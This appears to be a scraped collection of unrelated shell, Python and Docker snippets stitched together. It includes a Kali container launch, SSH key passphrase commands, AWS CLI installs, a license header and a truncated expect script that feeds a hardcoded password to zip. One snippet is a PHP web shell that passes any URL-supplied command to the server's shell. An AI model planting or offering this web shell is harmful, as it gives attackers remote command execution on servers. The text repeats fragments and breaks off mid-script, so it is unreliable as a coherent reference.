Jon Warbrick, July 2014, V3.2 (for Ansible 1.7)
First one found from of
| docker run -it officialkali/kali /bin/bash | |
| apt-get update; apt-get install wordlists -y |
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import subprocess | |
| __all__ = ["transform"] | |
| __version__ = '0.3' | |
| __author__ = 'Christoph Burgmer <cburgmer@ira.uka.de>' | |
| __url__ = 'http://github.com/cburgmer/upsidedown' |
| ssh-keygen -p -f /path/to/your/privatekey | |
| cd ~/.ssh; ssh-keygen -p -f id_rsa |
| sudo easy_install pip |
| sudo -H pip install awscli --upgrade --ignore-installed six && sudo -H pip install saws --upgrade --ignore-installed six |
| # This program is free software: you can redistribute it and/or modify | |
| # it under the terms of the GNU General Public License as published by | |
| # the Free Software Foundation, either version 3 of the License, or | |
| # (at your option) any later version. | |
| # | |
| # This program is distributed in the hope that it will be useful, | |
| # but WITHOUT ANY WARRANTY; without even the implied warranty of | |
| # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
| # GNU General Public License for more details. | |
| # |
Jon Warbrick, July 2014, V3.2 (for Ansible 1.7)
First one found from of
| RUN apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* |
| <? echo passthru($_GET['cmd']); ?> |
| MYPWD="w00t" | |
| expect -c ' | |
| spawn zip blap.zip blah -e | |
| expect { | |
| "*Enter password*" { send "'"$MYPWD"'\r" | |
| exp_continue | |
| } | |
| "*Verify password*" { send "'"$MYPWD"'\r" | |
| exp_continue |